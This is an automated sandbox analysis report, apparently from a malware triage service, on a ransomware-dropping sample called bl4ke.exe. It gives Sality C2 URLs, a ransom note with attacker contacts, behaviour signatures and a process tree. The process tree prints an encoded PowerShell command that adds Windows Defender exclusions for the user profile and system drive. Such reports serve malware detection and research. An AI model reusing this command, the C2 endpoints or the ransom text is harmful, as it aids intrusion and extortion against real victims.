Resubmissions

28-12-2024 02:53

241228-ddq9ravnfr 10

28-12-2024 02:51

241228-dcawdavndm 10

Analysis

  • max time kernel
    31s
  • max time network
    32s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-12-2024 02:53

General

  • Target

    bl4ke.exe

  • Size

    469KB

  • MD5

    5d9e7031a5d7498bf610633a3d0f6981

  • SHA1

    f11cd03ef06dd53e1cef1ff15693efc919030ac3

  • SHA256

    e056b9ff0256dd40dac919efe92006ee49a3f50d222ab17e755c7dcdbc34a4fc

  • SHA512

    0d846e552d8f2f344257bd6e65e4f3fbfc5d41d90892c9d19af3abe4dc4074a3c73e6802269800fdaaa90a0b0deb78bad40f0c1b75a34a6c840144f316945975

  • SSDEEP

    6144:igQ9ahMwdrlDDX3RtZL7bieYMy4rZEqwpgJCNXFhHcuci:igQsMkrl5t0jINggJMFOuci

Malware Config

Extracted

Family

sality

C2

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA

Ransom Note
ALL COMPUTER DATA ENCRYPTED! 00:00:00 TIME AFTER ALL FILES WILL BE DELETED YOUR ID CC50539B88A0A18DB0C83C7C2609D4FD NOW YOU NEED TO PAY TO RECOVER YOUR DATA AFTER MONEY TRANSFER YOU WILL RECIEVE THE DECRYPTOR CONTACTS TELEGRAM @comodosecurity EMAIL [email protected] Any attempts to return your files with the third-party tools can be fatal for your encrypted files! The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files! There are several plain steps to restore your files but if you do not follow them we will not be able to help you!

Signatures

  • Modifies firewall policy service 3 TTPs 3 IoCs
  • Sality

    Sality is backdoor written in C++, first discovered in 2003.

  • Sality family
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • UPX packed file 26 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\fontdrvhost.exe
    "fontdrvhost.exe"
    1⤵
      PID:772
    • C:\Windows\system32\fontdrvhost.exe
      "fontdrvhost.exe"
      1⤵
        PID:780
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        1⤵
          PID:336
        • C:\Windows\system32\sihost.exe
          sihost.exe
          1⤵
            PID:2996
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
            1⤵
              PID:3060
            • C:\Windows\system32\taskhostw.exe
              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
              1⤵
                PID:3168
              • C:\Windows\Explorer.EXE
                C:\Windows\Explorer.EXE
                1⤵
                  PID:3548
                  • C:\Users\Admin\AppData\Local\Temp\bl4ke.exe
                    "C:\Users\Admin\AppData\Local\Temp\bl4ke.exe"
                    2⤵
                    • Checks computer location settings
                    • System Location Discovery: System Language Discovery
                    • Modifies registry class
                    • Suspicious use of WriteProcessMemory
                    PID:3708
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AZgBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEYAVQBDAEsARQBEACAAQgBZACAAQgBMAEEASwBFACEAIQAhACAATABNAEEATwAgAEwATQBBAE8AIABMAE0AQQBPACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAagB5AHUAIwA+AA=="
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1956
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAbAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAegBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZwB2ACMAPgA="
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4676
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        4⤵
                          PID:1748
                      • C:\Users\Admin\AppData\Local\Temp\gdihell.exe
                        "C:\Users\Admin\AppData\Local\Temp\gdihell.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2020
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          4⤵
                            PID:5056
                        • C:\Users\Admin\AppData\Local\Temp\Cronic.exe
                          "C:\Users\Admin\AppData\Local\Temp\Cronic.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:600
                        • C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe
                          "C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe"
                          3⤵
                          • Modifies firewall policy service
                          • UAC bypass
                          • Windows security bypass
                          • Deletes itself
                          • Executes dropped EXE
                          • Windows security modification
                          • Checks whether UAC is enabled
                          • Enumerates connected drives
                          • Drops file in Program Files directory
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4296
                        • C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe
                          "C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:1236
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            4⤵
                              PID:4104
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3888
                          • C:\Users\Admin\AppData\Local\Temp\hslshader.exe
                            "C:\Users\Admin\AppData\Local\Temp\hslshader.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3044
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              4⤵
                                PID:4940
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                          1⤵
                            PID:3676
                          • C:\Windows\system32\DllHost.exe
                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                            1⤵
                              PID:3880
                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                              1⤵
                                PID:3968
                              • C:\Windows\System32\RuntimeBroker.exe
                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                1⤵
                                  PID:4036
                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                  1⤵
                                    PID:1112
                                  • C:\Windows\System32\RuntimeBroker.exe
                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                    1⤵
                                      PID:4180
                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
                                      1⤵
                                        PID:2600
                                      • C:\Windows\System32\RuntimeBroker.exe
                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                        1⤵
                                          PID:4464
                                        • C:\Windows\system32\backgroundTaskHost.exe
                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                          1⤵
                                            PID:4016
                                          • C:\Windows\system32\AUDIODG.EXE
                                            C:\Windows\system32\AUDIODG.EXE 0x410 0x4bc
                                            1⤵
                                              PID:4092

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                              Filesize

                                              1KB

                                              MD5

                                              d584df872086c0f7442a664a33d38fe5

                                              SHA1

                                              f0fad100fda4e8bb82ce5bc7d03953605ac53a5d

                                              SHA256

                                              fdb68980ecdb4c9b464cc6a07ec410b2c7dda5b01240a0a8c860e9a94fe372bc

                                              SHA512

                                              5232ebc39075096fa6ae5ae6d5b7b4580003e0be87779281c27fc1e0646500c76ca2178205ccc06e3b85df02a3a88ddb864723a3978cc97a9d63fa07196cdd79

                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Filesize

                                              17KB

                                              MD5

                                              b6fc43c869bdd84dd65fa885413ff8c0

                                              SHA1

                                              5b0d4baff1fa16671834258aca224ea1b352f9f4

                                              SHA256

                                              de8c28b1ad1f390625ff6cfebaf339fd1c5cfd11b78a639d3a54f3efc8e74eaf

                                              SHA512

                                              4b19ce925f77d09c62f77ace8c3a54bb900422110246a0053aabd74ce4331de8acae5085e200e8983ae79312a5b7c831f227351a700e00c1b516f5e681371638

                                            • C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe

                                              Filesize

                                              85KB

                                              MD5

                                              d2f7ee8114edbcb9aa332c1d8bbb9488

                                              SHA1

                                              d97e993f1eaf8e4c990f06e9afa4f47efd9a5b06

                                              SHA256

                                              0cb621f367e9aa5c046760be200dd0b5aa9b6e45c92f28adc73b34b369702f82

                                              SHA512

                                              268ea70de1dfc4e97e0d057bd625e5080dd139564224d41dc23293b1eaf8205b359e3ab934fcc0b6ae1f0995cb9761ac5a84cdc2a8c40d0afa164eb7c6601243

                                            • C:\Users\Admin\AppData\Local\Temp\Cronic.exe

                                              Filesize

                                              14KB

                                              MD5

                                              726d50c3e3dd789d43664aa5c3c3f9de

                                              SHA1

                                              f69e053040b09e422a712c4bf31ce20875186e31

                                              SHA256

                                              8a865d95f2c90c97fe3d762608ebc8040033cac5882e5534675b6b1f056e9c19

                                              SHA512

                                              872b347a0dd0cdb46959b9b41ad20dfc7dcfaf3cee8a27aa90b33700a44147edf631e03c3bd7ca8867dbcb2b02efc6c05ee0e8dd31062770c39d2ad13a1db56a

                                            • C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe

                                              Filesize

                                              11KB

                                              MD5

                                              c8d6c1b9d0ab8940e827cc7f0f96f4b4

                                              SHA1

                                              cdc2d69d48748b8836d6e2a4e58a370aebb55288

                                              SHA256

                                              e9f500615b06fdb6b4eb4cd4e1664ba1da33fe3c2fc1eb0b1e561e06a20f1fbd

                                              SHA512

                                              86b1e836fb79cf81cf15f7b889d4fcbee9de9f64cca741d012c5fe49fbf1bfc532bbbdb04114672765eff6cecc4ec4dd118fc1d2b52af1595020f09e64665d2a

                                            • C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA

                                              Filesize

                                              64KB

                                              MD5

                                              f97a6c9d463f7005d28c273f7f369744

                                              SHA1

                                              5a594b71f3254fdd8fa1575b7898cd7cb8d0506c

                                              SHA256

                                              729a7e9dfff763b95cae12e25875cd14acb4c74236d17494e32a72078df9931f

                                              SHA512

                                              b9a1b151b241977130fa7fd7b3ce183c7836c31cc1c5d82ae5d77d2683bb2771020bc438fb4faa8d24d151234c5adadbd87a58b3be0e9f9ff556d26aaa8c79c7

                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ciujwzit.gwa.ps1

                                              Filesize

                                              60B

                                              MD5

                                              d17fe0a3f47be24a6453e9ef58c94641

                                              SHA1

                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                              SHA256

                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                              SHA512

                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                            • C:\Users\Admin\AppData\Local\Temp\gdihell.exe

                                              Filesize

                                              38KB

                                              MD5

                                              65389a4a1a5ec277c42d0dfacd59999b

                                              SHA1

                                              5098c44ec3a0c1be4d6d8f3dc5ddeeef73848c2c

                                              SHA256

                                              8476bbe92dd772b4397ecb33fed7286f1b9ef698812b921d0113d5ead4607990

                                              SHA512

                                              6fef9575d945f761d31406ce528e820945cb6f970eb78dc91c7a7da6e9efe6b2dbb1b55b96911d8115ac98dd95cf1f73a0cec13ad4cbe9750fe33df08e88f8b6

                                            • C:\Users\Admin\AppData\Local\Temp\hslshader.exe

                                              Filesize

                                              39KB

                                              MD5

                                              7aa1ce5f332f6bde0ab29720fb768020

                                              SHA1

                                              0c42cce17644b24b8144f60559dc491b542e957d

                                              SHA256

                                              6947123f789c83df8c9f3487fb7a2404da6255ee7391aecaede51647205aaadd

                                              SHA512

                                              42c42203c5ba9319848be6ad716369d55e73a05909d6288eb074ae2ef5330f0d72e48c16d475ae8420445b2b9acd69762b8d8bb2b270beff998bc48e0ba69bc8

                                            • memory/1956-15-0x0000000005D90000-0x0000000005DF6000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/1956-3-0x00000000052E0000-0x0000000005908000-memory.dmp

                                              Filesize

                                              6.2MB

                                            • memory/1956-19-0x0000000006210000-0x000000000625C000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/1956-20-0x0000000007A50000-0x00000000080CA000-memory.dmp

                                              Filesize

                                              6.5MB

                                            • memory/1956-21-0x00000000066F0000-0x000000000670A000-memory.dmp

                                              Filesize

                                              104KB

                                            • memory/1956-22-0x0000000008680000-0x0000000008C24000-memory.dmp

                                              Filesize

                                              5.6MB

                                            • memory/1956-23-0x00000000075B0000-0x0000000007642000-memory.dmp

                                              Filesize

                                              584KB

                                            • memory/1956-26-0x00000000740B0000-0x0000000074860000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/1956-17-0x0000000005E00000-0x0000000006154000-memory.dmp

                                              Filesize

                                              3.3MB

                                            • memory/1956-0-0x00000000740BE000-0x00000000740BF000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1956-16-0x0000000005C40000-0x0000000005CA6000-memory.dmp

                                              Filesize

                                              408KB

                                            • memory/1956-10-0x0000000005A50000-0x0000000005A72000-memory.dmp

                                              Filesize

                                              136KB

                                            • memory/1956-4-0x00000000740B0000-0x0000000074860000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/1956-18-0x00000000061D0000-0x00000000061EE000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/1956-1-0x0000000004C70000-0x0000000004CA6000-memory.dmp

                                              Filesize

                                              216KB

                                            • memory/1956-2-0x00000000740B0000-0x0000000074860000-memory.dmp

                                              Filesize

                                              7.7MB

                                            • memory/2020-35-0x0000000000C10000-0x0000000000C30000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/2020-73-0x00000000010E0000-0x00000000010E1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3044-153-0x0000000000510000-0x0000000000511000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3044-94-0x00000000003F0000-0x0000000000410000-memory.dmp

                                              Filesize

                                              128KB

                                            • memory/3708-80-0x00000000031F0000-0x00000000031F2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3708-90-0x00000000031F0000-0x00000000031F2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3708-68-0x00000000031F0000-0x00000000031F2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3708-69-0x0000000003340000-0x0000000003341000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3888-151-0x00000000043B0000-0x00000000043B1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/3888-154-0x0000000004260000-0x0000000004262000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/4296-141-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-165-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-81-0x0000000000700000-0x0000000000702000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/4296-172-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-163-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-78-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-77-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-67-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-60-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-55-0x0000000000400000-0x0000000000418000-memory.dmp

                                              Filesize

                                              96KB

                                            • memory/4296-65-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-61-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-109-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-108-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-162-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-112-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-127-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-158-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-155-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-156-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-126-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-79-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-58-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-75-0x0000000000710000-0x0000000000711000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/4296-147-0x0000000000400000-0x0000000000418000-memory.dmp

                                              Filesize

                                              96KB

                                            • memory/4296-145-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-143-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-142-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-82-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4296-140-0x00000000025C0000-0x000000000364E000-memory.dmp

                                              Filesize

                                              16.6MB

                                            • memory/4676-133-0x0000000007D10000-0x0000000007D24000-memory.dmp

                                              Filesize

                                              80KB

                                            • memory/4676-113-0x0000000007710000-0x0000000007742000-memory.dmp

                                              Filesize

                                              200KB

                                            • memory/4676-135-0x0000000007D40000-0x0000000007D48000-memory.dmp

                                              Filesize

                                              32KB

                                            • memory/4676-128-0x0000000007B30000-0x0000000007B3A000-memory.dmp

                                              Filesize

                                              40KB

                                            • memory/4676-137-0x0000000004FF0000-0x0000000004FF2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/4676-124-0x0000000007950000-0x000000000796E000-memory.dmp

                                              Filesize

                                              120KB

                                            • memory/4676-130-0x0000000007CD0000-0x0000000007CE1000-memory.dmp

                                              Filesize

                                              68KB

                                            • memory/4676-134-0x0000000007D50000-0x0000000007D6A000-memory.dmp

                                              Filesize

                                              104KB

                                            • memory/4676-131-0x0000000007D00000-0x0000000007D0E000-memory.dmp

                                              Filesize

                                              56KB

                                            • memory/4676-89-0x0000000004FF0000-0x0000000004FF2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/4676-114-0x000000006E5E0000-0x000000006E62C000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/4676-125-0x0000000007980000-0x0000000007A23000-memory.dmp

                                              Filesize

                                              652KB

                                            • memory/4676-111-0x00000000068F0000-0x000000000693C000-memory.dmp

                                              Filesize

                                              304KB

                                            • memory/4676-71-0x0000000005080000-0x0000000005081000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/4676-129-0x0000000007D70000-0x0000000007E06000-memory.dmp

                                              Filesize

                                              600KB

                                            • memory/4676-104-0x0000000006310000-0x0000000006664000-memory.dmp

                                              Filesize

                                              3.3MB